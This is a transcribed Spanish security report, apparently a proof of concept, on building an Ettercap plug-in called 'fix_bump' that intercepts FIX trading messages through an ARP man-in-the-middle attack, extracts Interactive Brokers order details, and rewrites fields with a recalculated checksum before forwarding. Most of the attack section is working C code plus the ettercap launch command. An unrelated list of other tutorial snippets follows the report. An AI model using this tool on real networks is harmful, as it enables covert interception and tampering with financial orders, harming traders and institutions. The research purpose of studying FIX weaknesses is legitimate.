Sniffing a protocolos FIX

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Sniffing a protocolos FIX"

Transcripción

1 Sniffing a protocolos FIX Programando un Plug-In para ettercap Adrián Portabales Goberna

2 1. Introducción Protocolos FIX: The Financial Information exchange (FIX) protocol is an electronic communications protocol initiated in 1992 for international real-time exchange of information related to the securities transactions and markets. With trillions of dollars traded annually on the NASDAQ alone, financial service entities are investing heavily in optimizing electronic trading and employing direct market access (DMA) to increase their speed to financial markets. Managing the delivery of trading applications and keeping latency low increasingly requires an understanding of the FIX protocol. Wikipedia. 1.2 Quien usa FIX? Se dice que almenos en el 90% de las operaciones electrónicas financieras. En la web nos encontramos un listado con las empresas que adoptan este protocolo. Instituciones, brokers/dealers, mercados financieros, bancos, fondos de inversión son los clientes típicos de este protocolo. En el siguiente imagen se expone un diagrama de un sistema FIX:

3 1.3 Mensajes FIX Los mensaje FIX es una serie de campos CLAVE=VALOR delimitados por el carácter ASCII 01 <start of header> (SOH). Esta compuesto por una cabecera, un cuerpo y un final. Por ejemplo en la versión 4.4 de FIX, la cabecera contendrá estos tres campos: 1. 8 (BeginString) 2. 9 (BodyLength) (MsgType) El cuerpo del mensaje es totalmente dependiente del tipo del mensaje definido en la cabecera. El ultimo campo del mensaje siempre sera el TAG 10 (Checksum) y estará compuesto por tres números (E.J.: 10=021). Por tanto y como decíamos el mensaje final sera la composición de estas tres partes. Un ejemplo de un mensaje entero podría ser algo tal que así: 8=FIX.4.2 9=178 35=8 49=PHLX 56=PERS 52= :30: =ATOMNOCCC =3 150=E 39=E 55=MSFT 167=CS 54=1 38=15 40=2 44=15 58=PHLX EQUITY TESTING 59=0 47=C 32=0 31=0 151=15 14=0 6=0 10=128 (sustituyendo la barra por el carácter <SOH>) 1.4 Conclusión Introducción Nos encontramos con un protocolo fundamental para el sistema actual donde se sustenta toda la economía de países, empresas etc. Ante este escenario, Podríamos decir que el protocolo FIX es seguro? Depende. Y es que la poca información que nos encontramos en internet sobre la seguridad de este protocolo y posibles ataques es NULA. Esto deja un camino muy grande por donde investigar. Que podríamos investigar? Vulnerabilidades en el software. Posibles riesgos de penetración y ataques DOS. Sniffing y parsing de mensajes. Y hasta donde la imaginación nos de... En este report nos centraremos en el Sniffing y parsing de mensajes. No existe nada en la red donde nos facilite esta tarea, así que nos centraremos en la programación de un Plug-In para el archiconocido Ettercap. Para esta tarea también podríamos programar, que seria lo lógico si quisiesemos simplemente representar los datos que viajan en la red, un dissector; Pero es que lo vamos a llevar mas allá e intentaremos modificar los datos que se envían.

4 2.Programando un Plug-In para Ettercap. Ettercap nos da la posibilidad de activar o desactivar plugins al vuelo, bajo demanda de lo que necesitemos. De serie ya trae diversos plugins instalados, además de un esqueleto para la programación de uno nuevo (~plug-ins/dummy) En el siguiente link tendremos un pequeño tutorial con mas detalle y es que buscare simplificar este paso. Me he encontrado con diversos problemas y explicare como solucionarlos, buscando la máxima simpleza. En la web de ettercap tendremos el código fuente de todo el software necesario. Necesitaremos ciertas librerías para poder compilar el Ettercap (Explicado en el archivo README en la raiz de la carpeta ettercap, sección REQUIRED LIBRARIES) 2.1 Partiendo de dummy.c Recomiendo partir de este archivo, ya que es lo que necesitaremos para programar nuestro primer Plug-In. Tendremos un codigo comentado y listo para empezar. Si quereis crear un nuevo archivo, copiar todo (Junto con los Makefile) a una nueva carpeta, y dentro de Makefile hacer un replace de las cadena dummy.c por el nombre de vuestro nuevo fichero. 2.2 Manos a la obra: Creación de fix_bump.c Que es fix_bump? Un plugin que detecta y modifica mensajes FIX. Como lo hace? Expliquemoslo: La primera parte del archivo sera las cabeceras necesarias para las funciones y estructuras del ettercap: #include <ec.h> #include <ec_plugins.h> #include <ec_packet.h> #include <ec_hook.h> Luego definiremos los prototipos y el registro del plugin: /* prototypes */ int plugin_load(void *); static int fix_bump_init(void *); static int fix_bump_fini(void *); static void fix_bump(struct packet_object *po); struct plugin_ops fix_bump_ops = { ettercap_version: EC_VERSION, name: "fix_bump", info: "Detect and modify data in fix protocol", version: "0.1", init: &fix_bump_init, fini: &fix_bump_fini, ; int plugin_load(void *handle){ return plugin_register(handle, &fix_bump_ops); static int fix_bump_init(void *dummy){ USER_MSG("fix_bump: plugin running...\n"); hook_add(hook_packet_tcp, &fix_bump); return PLUGIN_RUNNING;

5 static int fix_bump_fini(void *dummy){ USER_MSG("fix_bump: plugin terminated...\n"); hook_del(hook_packet_tcp, &fix_bump); return PLUGIN_FINISHED; La segunda parte del archivo sera la función donde se encontrara el algoritmo de nuestro plugin, la primera versión solo servirá para rastrear los mensajes FIX y lo definiremos así: static void fix_bump(struct packet_object *po){ char tmp1[max_ascii_addr_len]; char tmp2[max_ascii_addr_len]; if (po->data.disp_len!= 0 && strstr(po->data.disp_data, "8=FIX")){ USER_MSG("Conexion: %s -> %s [%d]\n",ip_addr_ntoa(&po->l3.src, tmp1), ip_addr_ntoa(&po- >L3.dst, tmp2), ntohs(po->l4.dst)); USER_MSG("Mensaje Fix: %s\n",po->data.data); Esta pequeña función en C lo que hará sera usar la estructura packet_object (mas información de como están definidas las estructuras de ettercap aquí) para buscar en los datos del todos los paquetes de la red el string 8=FIX que sera el identificativo de un mensaje FIX. Una vez encontrado el mensaje se imprimirá la conexión (ip fuente ip destino [puerto]) y el mensaje en si. Compilando esto ya tendremos un plugin funcional y podrás leer todos los mensajes FIX no encriptados. Si queremos ejecutarlo recomiendo usar el siguiente comando: sudo ettercap -T -M arp:remote -i eth0 // // -q -P fix_bump Los comandos ejecutados son los siguientes: -T: Usar modo texto -M <METHOD:ARGS>: Seleccionar un man in the middle attack arp -i <iface>: Interfaz de red donde esta conectado nuestro pc -q: Modo quiet, no imprima nada -P <plugin>: Iniciar Plug-In Ejemplo de salida:

6 2.3 Resaltando las compras de un broker real. Y si estamos en una red donde se use distintos brokers, y queremos resaltar las compras de acciones, Podemos? Por supuesto. En esta prueba de concepto usare la aplicación movil de Interactive Brokers (mobiletws), es decir, un software real usado por miles de profesionales del Trading. El motivo de usar la aplicación móvil es que la aplicación de escritorio cifran ciertos campos (que no todos) mientras que en la aplicación móvil apenas se cifran nada (Muy mala practica..) Primero haremos el parsing en nuestro Plug-In, modificaremos la función principal con el siguiente código: char *tmp,*tipocompra,compra[10],*compra2,cantidad[10],*cantidad2; if (po->data.disp_len!= 0 && strstr(po->data.disp_data, "8=FIX")){ USER_MSG("Conexion %s -> %s [%d]\n",ip_addr_ntoa(&po->l3.src, tmp1), ip_addr_ntoa(&po- >L3.dst, tmp2), ntohs(po->l4.dst)); USER_MSG("\t%s\n",po->DATA.data); tmp = strdup(po->data.disp_data); compra2 = strstr(tmp, "7104="); if (compra2!= NULL){ compra2 = compra2+5; memset(compra,0,sizeof(compra)); memcpy(compra,compra2, searchsoh(compra2)); if(strstr(tmp, "54=")[3]==66) tipocompra="compra"; else if (strstr(tmp, "54=")[3]==83) tipocompra="venta"; cantidad2 = (strstr(tmp, "151=")+4); memset(cantidad,0,sizeof(cantidad)); memcpy(cantidad,cantidad2, searchsoh(cantidad2)); USER_MSG("Operacion detectada!!\n \t Tipo: %s ",tipocompra); USER_MSG("Precio: \t %s \t",compra); USER_MSG("Cantidad: \t %s \t ",cantidad); USER_MSG("\n"); Buscaremos el tag 7104 ya que he descubierto que es el que usa Interactive Brokers (de aquí en adelante IB) para las compras. Si existe ese tag en el mensaje es que se esta efectuando una compra o venta de acciones. En la programación de un plugin de Ettercap siempre deberemos inicializar una variable del tipo char * var[] con la llamada al sistema memset() si no tendremos un Segmentation Fault. Toda la lógica de este pequeño código es para la representación de los datos obtenidos. Ejemplo de compra de acciones:

7 Operamos primero en el móvil. Y vemos la operación en nuestra pantalla del PC: 2.4 Una vuelta de tuerca, Y si queremos modificar los mensajes que se envían? Supongo que a la altura de este report puedes pensar, Esto mismo no se se puede hacer con un filtro del ettercap? Efectivamente, hasta llegado a este punto. Y es que cuando modificamos alguna cadena en un mensaje FIX el valor del CheckSum cambiara, por tanto necesitaríamos recalcularlo o la aplicación nos dará error. Por tanto he creado las siguientes funciones para para poder modificar los valores de los mensajes, añadiendo al final el nuevo CheckSum recalculado.

8 Función para recalcular el nuevo CheckSum. Gracias a este link, donde encontraremos toda la información necesaria. char *GenerateCheckSum( char *buf, long buflen ) { static char tmpbuf[ 4 ]; long idx; unsigned int cks; for( idx = 0L, cks = 0; idx < buflen; cks += (unsigned int)buf[ idx++ ] ); sprintf( tmpbuf, "%03d", (unsigned int)( cks % 256 ) ); return( tmpbuf ); Funciones Auxiliares: //Funcion que que busca el modulo del checksum a partir de una cadena con checksum. //Devuelve un int que sera el modulo de la funcion GenerateCheckSum long calcularchecksum(char *cadena,char *valor_a_comprobar){ long i=0; while(1){ if (strcmp(generatechecksum(cadena,i),valor_a_comprobar)==0) break; i++; return i; //Quita el checksum de una cadena, devolviendo la cadena por la variable salida sin el checksum. Devuelve el checksum eliminado char *quitarchecksum(char *cadena,char *salida,char checksum[]){ int i; i = strlen(cadena)-2; while(cadena[i]!=0x01){ i--; i++; strcpy(salida,cadena); salida[i] = '\0'; int j; int f=0; while(strlen(cadena)>i+3){ j =i+3; if(cadena[j]==0x01) break; checksum[f]=cadena[j]; i++; f++; return checksum; //Busca el primer caracter SOH de una cadena dada int *searchsoh(char *cadena){ int i=0; while(i<strlen(cadena)){ if (cadena[i]==0x01){break; i++; return i;

9 Función Principal static void fix_bump(struct packet_object *po){ char *tmp,*tmp3,*tipocompra,compra[10],tag[10],*compra2,cantidad[10],*cantidad2; char a[6]; char nuevovalor[256],valorviejo[20]; int i=0,j=0; char tmp1[max_ascii_addr_len]; char tmp2[max_ascii_addr_len]; if (!(po->flags & PO_FORWARDABLE)) return PLUGIN_FINISHED; if (GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("fix_bump: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; if (po->data.disp_len!= 0 && strstr(po->data.disp_data, "8=FIX")){ USER_MSG("Conexion %s -> %s [%d]\n",ip_addr_ntoa(&po->l3.src, tmp1), ip_addr_ntoa(&po- >L3.dst, tmp2), ntohs(po->l4.dst)); USER_MSG("\t%s\n",po->DATA.data); tmp = strdup(po->data.disp_data); memset(a, 0, sizeof(a)); //GBL_OPTIONS->quiet = 1; ui_input("\ndesea modificar el mensaje? 1-Si 0-No : ", a, sizeof(a), NULL); if (strcmp(a,"1")==0){ memset(nuevovalor, 0, sizeof(nuevovalor)); ui_input("introduzca el tag a modificar con la estructura CLAVE=VALOR : ", nuevovalor, sizeof(nuevovalor), NULL); char salida[512]; char checksum[150]; memset(salida, 0, sizeof(salida)); memset(checksum, 0, sizeof(checksum)); quitarchecksum(tmp,salida,checksum); long nuevomodulochecksum=calcularchecksum(salida,checksum); memset(tag,0,sizeof(tag)); memcpy(tag,nuevovalor, searchequals(nuevovalor)); //Buscamos la CLAVE=VALOR vieja que vamos a remplazar memset(valorviejo,0,sizeof(valorviejo)); tmp3 = strstr(tmp,tag); memcpy(valorviejo,tmp3,searchsoh(tmp3)); strcpy(salida,replace_str(salida,valorviejo,nuevovalor)); char *nuevochecksum=generatechecksum(salida,nuevomodulochecksum); //Concatenamos con el nuevo checksum strcat(salida,"10="); strcat(salida,nuevochecksum); //Anhadimos al final el caracter <SOH> int tam = strlen(salida); salida[tam]=0x01; salida[tam+1]='\0'; USER_MSG("\n\n\n%s\n",salida ); USER_MSG("%s\n\n\n\n",po->DATA.disp_data); memcpy(po->data.disp_data,salida,strlen(salida)-9); memcpy(po->data.data,salida,strlen(salida)-9); //po->data.disp_data=salida; //str_replace(&po->data.disp_data, po->data.disp_data, "otra forma de reemplazar"); //Flag de paquete modificado

10 po->flags = PO_MODIFIED; size_t max_len; max_len = GBL_IFACE->mtu - (po->l4.header - (po->packet + po->l2.len) + po->l4.len); /* the packet has exceeded the MTU */ if (po->data.len > max_len) { po->data.inject = po->data.data + max_len; po->data.inject_len = po->data.len - max_len; po->data.delta -= po->data.len - max_len; po->data.len = max_len; USER_MSG("que envia: %s\n\n\n\n",po->data.disp_data); USER_MSG("que envia: %s\n\n\n\n",po->data.data); Se ha modificado la función principal para que una vez detectado un mensaje FIX pregunte al usuario con la función ui_input implementada en ettercap si desea modificar el mensaje. En caso afirmativo se propone que se introduzca un string de la forma TAG=VALOR que sera el nuevo valor del tag elegido. Cambien se hacen las operaciones necesarias para eliminar el viejo checksum y añadir el nuevo. Parámetros a destacar para ettercap: GBL_OPTIONS->quiet = 1; Se usara para no imprimir nada mientras se interactué con la consola. po->flags = PO_MODIFIED; Para cuando se modifique el paquete. La forma de introducir un valor a ettercap, sera inicializando la variable con memset.

11 Ejemplo de ejecución (Usuario busca el índice IBEX y se lo cambiamos por la acción Facebook $FB):

12 El trafico en la red: Observamos que Paquete 32 es el cliente, el cual redirige su trafico hacia mi tarjeta de red (ya que estamos creando un MITM) y luego el Paquete 33 ya se redirige al router con la información cambiada. Imagen 1: Lo que envia el usuario Imagen 2: Como se modifica.

13 Bibliografia: urity_tools/developing_dissectors_and_plug-ins_for_the_ettercap_network_sniffer#networkst- CHP-2-FIG-2

AGREGAR UN EQUIPO A UNA RED Y COMPARTIR ARCHIVOS CON WINDOWS 7

AGREGAR UN EQUIPO A UNA RED Y COMPARTIR ARCHIVOS CON WINDOWS 7 Tutoriales de ayuda e información para todos los niveles AGREGAR UN EQUIPO A UNA RED Y COMPARTIR ARCHIVOS CON WINDOWS 7 Como agregar a una red existente un equipo con Windows 7 y compartir sus archivos

Más detalles

Objetivos de la práctica: - Practicar uso de ficheros: abrir, cerrar y tratamiento de información contenida en el fichero.

Objetivos de la práctica: - Practicar uso de ficheros: abrir, cerrar y tratamiento de información contenida en el fichero. Objetivos de la práctica: - Practicar uso de ficheros: abrir, cerrar y tratamiento de información contenida en el fichero. Uso de Ficheros Todas las estructuras de datos vistas hasta ahora utilizan la

Más detalles

Internet Information Server

Internet Information Server Internet Information Server Internet Information Server (IIS) es el servidor de páginas web avanzado de la plataforma Windows. Se distribuye gratuitamente junto con las versiones de Windows basadas en

Más detalles

Combinar correspondencia (I)

Combinar correspondencia (I) Combinar correspondencia (I) Mediante la opción Combinar correspondencia Word2007 nos permite incluir en un documento, datos almacenados en otro sitio. De esta forma podremos obtener copias de un mismo

Más detalles

GUIA PRÁCTICA PARA LA FIRMA DIGITAL DE UN PDF A PARTIR DE UN PDF CREADO POR TI.

GUIA PRÁCTICA PARA LA FIRMA DIGITAL DE UN PDF A PARTIR DE UN PDF CREADO POR TI. GUIA PRÁCTICA PARA LA FIRMA DIGITAL DE UN PDF A PARTIR DE UN PDF CREADO POR TI. AUTOR: 1 INTRODUCCIÓN Con la entrada en vigor de la reforma de la LEC, los profesionales, letrados y procuradores, nos vemos

Más detalles

MANUAL DE USUARIO. Convocatoria 2011 Fundación para la Prevención de Riesgos Laborales IT-0130/2011 Implementa-T

MANUAL DE USUARIO. Convocatoria 2011 Fundación para la Prevención de Riesgos Laborales IT-0130/2011 Implementa-T Convocatoria 2011 Fundación para la Prevención de Riesgos Laborales IT-0130/2011 Implementa-T MANUAL DE USUARIO Herramienta de Autogestión de Prevención de Riesgos Laborales para la PYME Jiennense Dep.

Más detalles

Instalar y configurar W3 Total Cache

Instalar y configurar W3 Total Cache Instalar y configurar W3 Total Cache en WordPress Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com La velocidad de carga de una web influye mucho a la hora de mejorar el

Más detalles

Ejercicios - Persistencia en Android: ficheros y SQLite

Ejercicios - Persistencia en Android: ficheros y SQLite Ejercicios - Persistencia en Android: ficheros y SQLite Índice 1 Uso de ficheros (0.5 puntos)...2 2 Persistencia con ficheros (0.5 puntos)...3 3 Base de datos: SQLiteOpenHelper (0.5 puntos)... 3 4 Base

Más detalles

MANUAL TARIFICADOR. Clic aquí Descargar Tarificador

MANUAL TARIFICADOR. Clic aquí Descargar Tarificador 1 de 16 MANUAL TARIFICADOR A continuación encontrara un Paso a Paso de la instalación del tarificador. 1 PASO. Digite en su navegador esta dirección : www.hablaporinternet.com; encontrara la siguiente

Más detalles

Proceso de cifrado. La fortaleza de los algoritmos es que son públicos, es decir, se conocen todas las transformaciones que se aplican al documento

Proceso de cifrado. La fortaleza de los algoritmos es que son públicos, es decir, se conocen todas las transformaciones que se aplican al documento Qué es AT-Encrypt nos permitirá dotar de contraseña a cualquier documento o carpeta. Este documento o carpeta sólo será legible por aquel que conozca la contraseña El funcionamiento del cifrado (o encriptación)

Más detalles

MANUAL TARIFICADOR A continuación encontrara un Paso a Paso de la instalación del tarificador.

MANUAL TARIFICADOR A continuación encontrara un Paso a Paso de la instalación del tarificador. 1 de 16 MANUAL TARIFICADOR A continuación encontrara un Paso a Paso de la instalación del tarificador. 1 PASO. Ejecutar el instalador " TARIFICADOR SHOP SERVICE TECHNOLOGIES " doble click Ejecutando el

Más detalles

ESCUELA SUPERIOR DE INFORMATICA Prácticas de Estadística UNA SESIÓN EN SPSS

ESCUELA SUPERIOR DE INFORMATICA Prácticas de Estadística UNA SESIÓN EN SPSS UNA SESIÓN EN SPSS INTRODUCCIÓN. SPSS (Statistical Product and Service Solutions) es un paquete estadístico orientado, en principio, al ámbito de aplicación de las Ciencias sociales, es uno de las herramientas

Más detalles

Examen Junio- Grupo A Lunes 17 de Junio - Programación en C++ Pág. 1

Examen Junio- Grupo A Lunes 17 de Junio - Programación en C++ Pág. 1 Examen Junio- Grupo A Lunes 17 de Junio - Programación en C++ Pág. 1 ÍNDICE ÍNDICE... 1 1.1 Ejercicio 1: Máquina Expendedora (3.5 ptos.)... 1 1.2 Ejercicio 2: Clase Circulo (1.0 pto.)... 3 1.3 Ejercicio

Más detalles

Iptables, herramienta para controlar el tráfico de un servidor

Iptables, herramienta para controlar el tráfico de un servidor Iptables, herramienta para controlar el tráfico de un servidor La seguridad es punto muy importante a tener en cuenta en cualquier organización de ahí que sea fundamental hacer uso de aquellos mecanismos

Más detalles

T3-Rondas V 1.1. Help-Pc, S.L. C/ Pintor Pau Roig, 39 L-5 08330 Premià de Mar Barcelona Tel. (93) 754 90 19 Fax 93 752 35 18 marketing@t2app.

T3-Rondas V 1.1. Help-Pc, S.L. C/ Pintor Pau Roig, 39 L-5 08330 Premià de Mar Barcelona Tel. (93) 754 90 19 Fax 93 752 35 18 marketing@t2app. T3-Rondas V 1.1 1 Indice 1 Requisitos mínimos 3 2 Instalación 3 2.1 Instalación del software 3 2.2 Instalación del terminal 4 3 Configuración Inicial 4 3.1 Crear terminales 5 3.2 Crear puntos de lectura

Más detalles

GVisualPDA Módulo de Almacén

GVisualPDA Módulo de Almacén GVisualPDA Módulo de Almacén GVisualPDA es una aplicación para Windows Mobile 5/6 que amplía más aún las posibilidades de integración del software de gestión GVisualRec permitiendo estar conectados en

Más detalles

MANUAL BÁSICO PARA CLIENTES

MANUAL BÁSICO PARA CLIENTES 2011 MANUAL BÁSICO PARA CLIENTES DEPARTAMENTO TÉCNICO COMENERSOL WIRELESS ÍNDICE Paso 0: Qué hacer cuando internet no funciona....3 Paso 1: Comprobar que la antena está bien conectada..4 Paso 2: Comprobar

Más detalles

En cualquier caso, tampoco es demasiado importante el significado de la "B", si es que lo tiene, lo interesante realmente es el algoritmo.

En cualquier caso, tampoco es demasiado importante el significado de la B, si es que lo tiene, lo interesante realmente es el algoritmo. Arboles-B Características Los árboles-b son árboles de búsqueda. La "B" probablemente se debe a que el algoritmo fue desarrollado por "Rudolf Bayer" y "Eduard M. McCreight", que trabajan para la empresa

Más detalles

Creando una webquests

Creando una webquests Creando una webquests 1. LO PRIMERO EL PROGRAMA Para crear paginas web necesitamos el software apropiado. Hay muchas formas y programas para hacerlo, pero por su facilidad de uso y por ser software libre

Más detalles

Configuración en Red

Configuración en Red Configuración en Red Si se ha adquirido este módulo posteriormente al programa OPTISYS, antes que nada, se deberá configurar la Naranja USB, con una nueva clave de actualización proporcionada por Lemon

Más detalles

Servicios Educativos Del Estado De Chihuahua Sistema Integral de Presupuestos y Materiales. Indice. Introducción... 2. Barra de Herramientas...

Servicios Educativos Del Estado De Chihuahua Sistema Integral de Presupuestos y Materiales. Indice. Introducción... 2. Barra de Herramientas... Indice Página Introducción... 2 Acceso al Sistema... 3 Barra de Herramientas... 4 Menú Principal... 5 Operación Catálogos Reportes Consultas Entradas Por Orden de Compra... 6 Entradas Directas... 8 Salidas

Más detalles

TÉCNICAS DE GESTIÓN ADMINISTRATIVA PARA PEQUEÑAS EMPRESAS

TÉCNICAS DE GESTIÓN ADMINISTRATIVA PARA PEQUEÑAS EMPRESAS COMBINAR CORRESPONDENCIA CON OFFICE 2003 Combinar correspondencia nos permite incluir en un documento datos almacenados en otro lugar. De esta forma podremos obtener copias de un mismo documento pero con

Más detalles

Sistemas de seguridad en redes inalámbricas: WEP, WAP y WAP2

Sistemas de seguridad en redes inalámbricas: WEP, WAP y WAP2 Sistemas de seguridad en redes inalámbricas: WEP, WAP y WAP2 Calle San Rafael, 14 28108 Alcobendas (Madrid) 902 90 10 20 www.acens.com Introducción Actualmente una de las formas más utilizadas para conectarse

Más detalles

Guía Rápida de Inicio

Guía Rápida de Inicio Guía Rápida de Inicio 1. Acerca de esta Guía Esta guía le ayudará a instalar y dar los primeros pasos con BitDefender Security for SharePoint. Para disponer de instrucciones detalladas, por favor, diríjase

Más detalles

AGREGAR COMPONENTES ADICIONALES DE WINDOWS

AGREGAR COMPONENTES ADICIONALES DE WINDOWS INSTALACIÓN DE IIS EN WINDOWS XP El sistema está desarrollado para ejecutarse bajo la plataforma IIS de Windows XP. Por esta razón, incluimos la instalación de IIS (Servidor de Web) para la correcta ejecución

Más detalles

Manual CMS Mobincube

Manual CMS Mobincube Manual CMS Mobincube CMS Mobincube Qué es? El CMS (Sistema de Gestión de Contenidos) es un completo website que permite la creación y actualización de contenido remoto. De esta forma, una vez creada una

Más detalles

Cómo instalar fácilmente tu WordPress tras contratar un hosting en Hostalia

Cómo instalar fácilmente tu WordPress tras contratar un hosting en Hostalia Cómo instalar fácilmente tu WordPress tras contratar un hosting en Hostalia Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com La puesta en marcha de WordPress es muy sencilla,

Más detalles

Archivo de correo con Microsoft Outlook contra Exchange Server

Archivo de correo con Microsoft Outlook contra Exchange Server Archivo de correo con Microsoft Outlook contra Exchange Server Resumen Con este proceso de archivado, lo que pretendemos es guardar nuestro correo en un archivo de datos, para así poder realizar una copia

Más detalles

Control de accesos autónomo por huella dactilar

Control de accesos autónomo por huella dactilar Manual de software Control de accesos autónomo por huella dactilar Access FP (SOFTWARE PARA LECTOR DE HUELLA DACTILAR SIMON ALERT REF.: 8902003-039) (Versión de sofware 1.1) (Versión de documento 1.2)

Más detalles

Quitar de un Directorio Activo Un Servidor que es el Maestro de Operaciones En Windows 2000 Server y Windows Server 2003

Quitar de un Directorio Activo Un Servidor que es el Maestro de Operaciones En Windows 2000 Server y Windows Server 2003 Quitar de un Directorio Activo Un Servidor que es el Maestro de Operaciones En Windows 2000 Server y Windows Server 2003 Josep Ros Suprimir un Maestro de Operaciones de Directorio Activo Introducción La

Más detalles

WINDOWS 2008 5: TERMINAL SERVER

WINDOWS 2008 5: TERMINAL SERVER WINDOWS 2008 5: TERMINAL SERVER 1.- INTRODUCCION: Terminal Server proporciona una interfaz de usuario gráfica de Windows a equipos remotos a través de conexiones en una red local o a través de Internet.

Más detalles

Introducción a la Programación en MATLAB

Introducción a la Programación en MATLAB Introducción a la Programación en MATLAB La programación en MATLAB se realiza básicamente sobre archivos M, o M-Files. Se los denomina de esta forma debido a su extensión.m. Estos archivos son simple archivos

Más detalles

Instalación de Microsoft Virtual PC

Instalación de Microsoft Virtual PC Instalación de Microsoft Virtual PC Virtual PC es un software de Microsoft que permite instalar varios sistemas operativos en la misma máquina, sin tener que reiniciar Windows y además de forma segura,

Más detalles

Practica A. Crear y Administrar Grupos

Practica A. Crear y Administrar Grupos Practica A Crear y Administrar Grupos Los grupos simplifican la administración ya que permiten dar permisos a grupos de usuarios en vez de uno a uno. Antes de comenzar a utilizar los grupos hay que entender

Más detalles

Acá vamos a ocuparnos de cómo realizar la instalación de una red intra-aula sobre Linux, concretamente en la distribución de GNU/Linux Ubuntu 9.04.

Acá vamos a ocuparnos de cómo realizar la instalación de una red intra-aula sobre Linux, concretamente en la distribución de GNU/Linux Ubuntu 9.04. Instalación de una red intra-aula sobre Linux (Ubuntu 9.04) Introducción La idea y la fundamentación de la creación de redes intra-aula, se puede encontrar en el siguiente enlace: http://www.fedaro.info/2009/06/29/redes-intra-aula/

Más detalles

REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS

REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS Escritorio remoto - 1 - Escritorio Remoto...- 3 - Definición de Escritorio Remoto... - 3 - Habilitar Escritorio Remoto... - 4 - Instalación del

Más detalles

CITRIX 4.5 - Citrix Application Streaming

CITRIX 4.5 - Citrix Application Streaming 1 de 39 01/12/2007 1:06 CITRIX 4.5 - Citrix Application Streaming Es la caracteristica principal de la versión 4.5 de Citrix, el Application Streaming, en este documento se explica cómo usarlo. Application

Más detalles

5.2.- Configuración de un Servidor DHCP en Windows 2003 Server

5.2.- Configuración de un Servidor DHCP en Windows 2003 Server 5.2.- Configuración de un Servidor DHCP en Windows 2003 Server En este apartado vamos a configurar el servidor DHCP de "Windows 2003 Server", instalado en el apartado anterior. Lo primero que hemos de

Más detalles

1. Ejemplo de clase : La clase Cuenta 2. Uso de la clase Cuenta. 3. Métodos y objetos receptores de mensajes (Importante)

1. Ejemplo de clase : La clase Cuenta 2. Uso de la clase Cuenta. 3. Métodos y objetos receptores de mensajes (Importante) 1. : La clase Cuenta. Uso de la clase Cuenta 3. Métodos y objetos receptores de mensajes (Importante) 1 Una clase para cuentas de un banco Vamos a modelar con una clase, un nuevo tipo de datos, donde los

Más detalles

Kaspersky Endpoint Security 10 - versión para casa

Kaspersky Endpoint Security 10 - versión para casa Kaspersky Endpoint Security 10 - versión para casa Como trabajadores de la UMA se ha llegado a un acuerdo con Kaspersky para que podamos disfrutar de un antivirus completo y con licencia en nuestros ordenadores

Más detalles

Cómo capturar páginas web con el programa GNU Wget

Cómo capturar páginas web con el programa GNU Wget Cómo capturar páginas web con el programa GNU Wget Raúl Araya, Judit Feliu, Mercedes Suárez {raul.araya; judit.feliu; mercedes.suarez}@iula.upf.es Qué es GNU Wget? Una utilidad de código abierto (GNU)

Más detalles

Manual del programador

Manual del programador Apéndice A Manual del programador A.1. Introducción En este capítulo vamos a dar un repaso general a toda la estructura que compone la aplicación de forma que el usuario se familiarice con ella y sobre

Más detalles

efactura Online La fibra no tiene competencia

efactura Online La fibra no tiene competencia Manual efactura Online La fibra no tiene competencia ÍNDICE efactura Online Interface de efactura Online Barra Superior Área de Trabajo. Pestañas Empresas Personalizar factura Clientes Facturar Crear una

Más detalles

Tipos de conexiones de red en software de virtualizacio n: VirtualBox y VMware

Tipos de conexiones de red en software de virtualizacio n: VirtualBox y VMware Tipos de conexiones de red en software de virtualizacio n: VirtualBox y VMware 1. Tipos de conexiones de red Los software de virtualización son programas que se utilizan para crear y manejar máquinas virtuales,

Más detalles

Pruebas de unidad con JUnit

Pruebas de unidad con JUnit Pruebas de unidad con JUnit Cuando se implementa software, resulta recomendable comprobar que el código que hemos escrito funciona correctamente. Para ello, implementamos pruebas que verifican que nuestro

Más detalles

Ficheros de configuración de Nagios (ejemplo con nrpe y snmp)

Ficheros de configuración de Nagios (ejemplo con nrpe y snmp) How-to sobre Nagios Realizado por Eugenio Fuentefría Oróns Índice. Qué es Nagios? Funcionalidades de Nagios Equipos usados para las pruebas Instalación de Nagios. Uso de Nagios Modos de extraer información

Más detalles

Curso de PHP con MySQL Gratis

Curso de PHP con MySQL Gratis Curso de PHP con MySQL Gratis Introducción Este mini curso o mini tutorial de PHP le ayudará a realizar cualquier sistema para que pueda insertar uno o varios registros a una base de datos con MySQL, este

Más detalles

CUPS Administración de impresora

CUPS Administración de impresora Rocío Alt. Abreu Ortiz 2009-3393 CUPS Administración de impresora Common Unix Printing System (Sistema de impresión común de Unix, abreviado CUPS) es un sistema de impresión modular para sistemas operativos

Más detalles

CONFIGURACION AVANZADA DE MOZILLA THUNDERBIRD

CONFIGURACION AVANZADA DE MOZILLA THUNDERBIRD CONFIGURACION AVANZADA DE MOZILLA THUNDERBIRD Carpetas sin Conexión... 2 Gestión de mensajes enviados... 3 Gestión de mensajes eliminados... 6 Firma Digital... 8 Envío de mensajes firmados digitalmente...

Más detalles

TUTORIAL ENVIO SMS MASIVOS. 1. Segmentación de la base de datos de clientes

TUTORIAL ENVIO SMS MASIVOS. 1. Segmentación de la base de datos de clientes TUTORIAL ENVIO SMS MASIVOS Para hacer uso de la utilidad de envío de SMS se tendrán en cuenta 3 puntos: 1. Segmentación de la base de datos de clientes, para determinar a quién va dirigido 2. Diferentes

Más detalles

El protocolo IMAP ofrece la descarga de correos en modo sólo lectura, es decir descarga sólo una copia del correo y no permite el borrado.

El protocolo IMAP ofrece la descarga de correos en modo sólo lectura, es decir descarga sólo una copia del correo y no permite el borrado. Manual de Configuración de correo en Android Utilizar POP o IMAP? Existen dos formas de configurar su cuenta de correo en dispositivos móviles, la primera es POP y la segunda es IMAP El protocolo POP es

Más detalles

Redirección de puertos

Redirección de puertos 1 Redirección de Puertos Redirección de puertos 2 Redirección de Puertos Índice 1. Introducción 3 2. Requisitos necesarios para redireccionar puertos en el router 6 3. Redireccionamiento de puertos 9 4.

Más detalles

